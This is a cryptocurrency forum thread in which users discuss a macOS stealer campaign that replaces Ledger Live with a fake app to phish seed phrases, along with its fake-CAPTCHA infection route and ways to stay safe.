Malware Installs Fake Ledger Live App on macOS

[Pmalek]

There is a new scam that targets Ledger and Ledger Live users on macOS. It's a phishing campaign meant to get victims' recovery phrases and steal their crypto. Most malware is created for Windows but users of other OS's must also be careful.

A person can get infected with an Atomic macOS Stealer malware from close to 3000 hacked websites. If that happens, the malware will look for the genuine Ledger Live app on your computer. If it finds it, the malware will uninstall Ledger Live and replace it with a fake and malicious app. When you run this software, you will see a pop-up notifying you of “suspicious activity” and "critical errors." To fix the problem and recover your coins, the app will ask you to enter your seed phrase.

You know what happens if you do. Your wallets will be drained and the scammers will steal all they can.
Take good care of your seeds and keys!


More information is available below:
https://x.com/BitcoinNewsCom/status/1926755303283978477

[Churchillvv]

Years back a lot of people claimed MacOS was immune to phishing attacks but in recently it proves otherwise that the internet generally isn't a safe place instead person care is more important especially for us who deal with crypto and bitcoin especially.

This fake ledger live app has been discussed if can remember but it was only targeting windows only but today it's more like general attacks, we just have to be careful. Probably airgapped device for a cold wallet will be better so we don't come in contact with this phishing attacks.

[Aanuoluwatofunmi]

Years back a lot of people claimed MacOS was immune to phishing attacks but in recently it proves otherwise that the internet generally isn't a safe place instead person care is more important especially for us who deal with crypto and bitcoin especially.

Even if it once happened like that, not anymore this time around, because scammers are also advancing more in their evil ways, they can penetrate on anything they wish to, the only way for us to be safe is when we could acheive the maximum security measures from our end, so we don't get engaged on malicious link, phishing sites and anything that could render vulnerability to us that we got attacked.

[Findingnemo]

It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.

No one is safe when they are in the space (online) so they must be keep looking for the pitfalls or better just don't install any apps from websites too often and regarding crypto, Ledger is fcuked up for a while so I wonder anyone still using it? Deserve to get phished...

[hd49728]

It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.

An operation system is not able to secure users if users are carelessly. From Windows, MacOS to Linux, there are bad people and attackers who want to do their "dark" jobs for stealing sensitive information and money of other people. You are only safe if you are careful with your practice, be knowledgeable about security that helps your practice enhancement, and if possible, manage to have AV software on your devices.

The first and most important protection layer is your carefulness, nothing else.

[promise444c5]

It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.

No operating system is completely safe from malware, and macOS is no exception but at least better than Windows, which faces tens of thousands of malware threats. While there are also some common Trojans for macOS, their number is minute compared to those found on Windows, likely due to Windows' larger global usage.

As more and more people start to use macOS, it could draw more attention from attackers yet, users are often the first point of vulnerability... if they avoid risky behaviors, they are far less likely to be affected

[Findingnemo]

It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.

No operating system is completely safe from malware, and macOS is no exception but at least better than Windows, which faces tens of thousands of malware threats.

This is what I am talking about, windows affected mostly because more apps available for people to download which includes OS itself so piracy is what makes the platform vulnerable not the actual one. Anyway as you and others said no OS is safe, we ought to keep ourselves secured in every possible way but the fact is we can never be sure because some attacks are so complicated that we only know when attackers asking for ransom. That's why don't take chances move to airgapped device so that you can be sure it's safe.

[rdluffy]

I had already heard something about this AMOS macOS Stealer
Look at the image of the “advertisement” for this malware:


Source: https://www.kandji.io/blog/amos-macos-stealer-analysis

the part that mentions the main wallets is quite scary 

I still don't understand how this malware manages to uninstall one program and install another on top of it
Wouldn't it trigger any permissions in MacOs before making these changes?

[Pmalek]

Years back a lot of people claimed MacOS was immune to phishing attacks but in recently it proves otherwise that the internet generally isn't a safe place instead person care is more important especially for us who deal with crypto and bitcoin especially.

Linux and Mac systems are generally thought of as being more secure than Windows. Overall that's true. Windows has way too many vulnerabilities and vectors of attack. But this is also a question of which operating system is worth more to attack and spend time customizing attacks. 8 and perhaps 9/10 computers run Windows worldwide. Scam artists are more likely to get the results they desire from the OS that's mostly used. It's a larger attack surface.

I still don't understand how this malware manages to uninstall one program and install another on top of it
Wouldn't it trigger any permissions in MacOs before making these changes?

No idea brother. Perhaps the victim gives the malware all the permissions it needs unknowingly when it interacts with it and gets the computer infected.

[Forsyth Jones]

the part that mentions the main wallets is quite scary 

I still don't understand how this malware manages to uninstall one program and install another on top of it
Wouldn't it trigger any permissions in MacOs before making these changes?

That's not all, the part of the code that infects Ledger Live and makes it prompts for mnemonic words can be avoided, but the malware scans the user's computer in search of their passwords, sensitive information saved in the browser... I wonder, some people usually take photos of the backup wallet containing the mnemonic words or even in a notepad...

A complete disaster.

The best way to avoid this type of malware is to avoid downloading cracked software and files from shady sites.

If the user operates the PC conscientiously, the chances of getting malware are drastically reduced.

[m2017]

There is a new scam that targets Ledger and Ledger Live users on macOS. It's a phishing campaign meant to get victims' recovery phrases and steal their crypto. Most malware is created for Windows but users of other OS's must also be careful.

But can't do that with Linux. This is a hint about which OS to use when using crypto.

A person can get infected with an Atomic macOS Stealer malware from close to 3000 hacked websites. If that happens, the malware will look for the genuine Ledger Live app on your computer. If it finds it, the malware will uninstall Ledger Live and replace it with a fake and malicious app. When you run this software, you will see a pop-up notifying you of “suspicious activity” and "critical errors." To fix the problem and recover your coins, the app will ask you to enter your seed phrase.

Cleverly conceived, there is no other way to say it. Many will surely fall for this trap. Is it possible to limit the rights of the user's account on Mac OS to exclude the possibility of malicious programs without the participation of the user of the replace program? This malicious program seems to be behaving like it owns the place.

[Pmalek]

The best way to avoid this type of malware is to avoid downloading cracked software and files from shady sites.

If the user operates the PC conscientiously, the chances of getting malware are drastically reduced.

Exactly. Unless you are cautious and have a healthy dosage of paranoia in you that prevents you from clicking around and downloading everything you see online, your computers will stay clean and malware-free. You can at least separate your most important activities, like dealing with money, and keep it compartmentalized on a safe PC and do other stuff on a different computer if you have to. 

Is it possible to limit the rights of the user's account on Mac OS to exclude the possibility of malicious programs without the participation of the user of the replace program? This malicious program seems to be behaving like it owns the place.

But what if the malware can make it seem like it's the user that gave it the needed rights by successfully replicating and pretending to be him/her? Everything is fine then.

[dkbit98]

There are two simple solutions to avoid getting this malware:
1. Stop using closed source windows OS
2. Stop using closed source ledger hardware wallets.

Temporary solution could also be to uninstall ledger live app,
hardware wallet can still be used with third party and native wallets, but you won't be able to update firmware.

[justinlamode]

It's a reminder to anyone who thinks that I am using Mac and iOS so I am completely safe from malware.

This is more like an end to an era. In other words, no one is immune from phishing and other forms of attack irrespective of the device you are using. I have friends that once boasted of being 100% secured due to their gadgets  but this new development is an eye opener to all that it has become more of safe practice than reliant on gadgets.

No one is safe when they are in the space (online) so they must be keep looking for the pitfalls or better just don't install any apps from websites too often and regarding crypto, Ledger is fcuked up for a while so I wonder anyone still using it? Deserve to get phished...

Where is the safe place to install apps from at this point because there were emphasis to use only official sites to download apps? I know there have been serious focus on Ledger by scammers, which makes it a bit scary to even use.

[Davidvictorson]

Yea, take good care of your seeds. It used to be windows and not the untouchables are not touchable. No one is spared from the possibility of a malware attack.
Download the original software from the official websites.
Have updated antivirus/ antimalware software and more often, scan your computer.
And yes, scan your computer without internet connection.

[Darker45]

If anybody buys a Ledger and is serious, responsible, and careful enough in making sure he/she's safe every step of the way, he/she would easily avoid falling to this scam.

We aren't short of reminders and warnings not to enter our seed phrase anywhere, except perhaps directly on the device itself. For some reasons, users end up entering their seed phrase on an app or a link, form, site, chat with an official support staff, whatever.

The warning isn't rocket science. It's simply saying not to enter the seed phrase anywhere. What's so hard to understand that?

[SFR10]

I still don't understand how this malware manages to uninstall one program and install another on top of it
Wouldn't it trigger any permissions in MacOs before making these changes?

I'll try to simplify it:

On a compromised site, they'll use one of those fake CAPTCHA's that ask users to prove they're not a robot > users will click on the "I'm not a robot" box to complete it, but by doing that, it'll trigger a Binance smart contract that delivers a command to the clipboard ^{[responsible for downloading & installing the malware]} > On the next step ^{[verification window]}, they'll ask users to run a certain command in terminal and by doing that, they'll be running the script for them.
^{- For more information, refer to this blog post: Over 2,800 hacked websites are infecting Macs with Atomic Stealer}

[Pmalek]

There are two simple solutions to avoid getting this malware:
1. Stop using closed source windows OS

This is not a Windows problem. It's a malware that targets and attacks macOS, not Windows users.

Temporary solution could also be to uninstall ledger live app,

If a malware can be configured to replicate Ledger Live and try to trick Ledger users, it can also be made to replicate other software, like Trezor Suite, etc. The brand isn't important here. Ledger wasn't chosen because it's closed-source but because scammers know that there are more people using Ledger than other hardware wallet brands. They attack there where they believe there are the greatest odds to succeed.

This is more like an end to an era. In other words, no one is immune from phishing and other forms of attack irrespective of the device you are using. I have friends that once boasted of being 100% secured due to their gadgets  but this new development is an eye opener to all that it has become more of safe practice than reliant on gadgets.

Nothing changes. You are still safe. This isn't a hack where some scammers have devised a way to steal from you without your input and knowledge. It's social engineering where the user sends them their keys because they were tricked. Don't get tricked. How often have you given your physical wallet to a stranger on the street who asked for it? My guess is 0. 

Where is the safe place to install apps from at this point because there were emphasis to use only official sites to download apps?

It's still from official sources and making sure you verify the signatures and authenticity of the software to be certain it came from their development team. 

[satscraper]

Notorious Ledger's subscription-based cloud service for backing up SEED phrases via Ledger Live proves that that it's technically possible to extract SEEDs from users' devices. They are already doing this for users who have subscribed to their backup service, but this mechanism opens the door to potential abuse by attackers ^{no matter who they are} simply because if Ledger Live can interact with a device in this way ^{and device itself allows such kind of interaction}, it's reasonable to assume that malicious actors could eventually reverse-engineer and clone the app to extract SEEDs from unsuspecting users.

This is especially concerning because many users assume that once they’ve downloaded Ledger Live from an official source it remains secure indefinitely. But as we see from the current development it’s possible for malware to replace silently the legitimate app with clones that look identical. Currently, most attacks over LL clones trick users into manually entering their SEED on a fake page. But the concern is that, in time, even this interaction with user may not be necessary for clone to extract SEED.

For those with more technical background, feel free to read the specifics of the current Ledger Live clones over there.

P.S. I personally can no longer recommend using devices from Ledger HW line and their software.

[KiaKia]

I use computer a lot, to surf the web and do other things and what I have learnt in the past years is that you can't be too careful using a computer, Windows OS for example is vulnerable, even with the inbuilt Windows Security app, you will still likely to get caught in the trojan Web.

The only way is to avoid Internet connections on your computer but why then do you buy a computer when you cant access the Web? Even antivirus can't safe you most of the times, so it end in a last stop.

The last stop is getting everything money and asset related off your computer and you will be safe even if there are invisible trojan on your computer, get a standalone open source hardware wallet that don't need some app to work.

This type of hardware wallets are called airgapped for this reason, they are always offline, they are already like phone with full HD screen where you can make your transactions with no need to download extra app or connect to computer.